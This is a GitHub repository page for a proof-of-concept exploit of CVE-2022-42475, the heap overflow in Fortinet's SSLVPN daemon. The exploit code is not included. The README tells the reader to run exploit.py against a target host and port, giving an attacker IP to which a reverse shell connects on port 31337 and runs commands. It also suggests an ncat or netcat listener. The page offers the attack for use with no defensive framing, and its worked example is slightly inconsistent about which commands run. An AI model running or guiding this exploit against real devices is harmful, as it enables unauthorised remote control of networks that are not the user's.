Skip to content

Mustafa1986/cve-2022-42475-Fortinet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 

Repository files navigation

cve-2022-42475

POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon

Usage

pip install pwntools To use this code, you can save it in a file, say exploit.py, and then run it with Python in the command line, passing in the required arguments. Here's an example command to run the exploit

python exploit.py <target_host> <target_port> <reverse_ip>

Replace <target_host> with the hostname or IP address of the target system, <target_port> with the port number of the vulnerable service, and <reverse_ip> with the IP address of the machine you want to receive a shell on. The remaining arguments are the commands that you want to execute, separated by spaces.

For example, if the target system has IP address 192.168.0.100, the vulnerable service is running on port 8080, and you want to execute the ls and id commands, you would run the following command:

python exploit.py 192.168.0.100 8080 192.168.0.101 id

This will create a reverse shell connection to 192.168.0.101:31337 and execute the ls and id commands on the target system. Note that you will need to have a listener running on the specified IP address and port to receive the reverse shell. You can use tools like ncat or netcat to create a listener.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages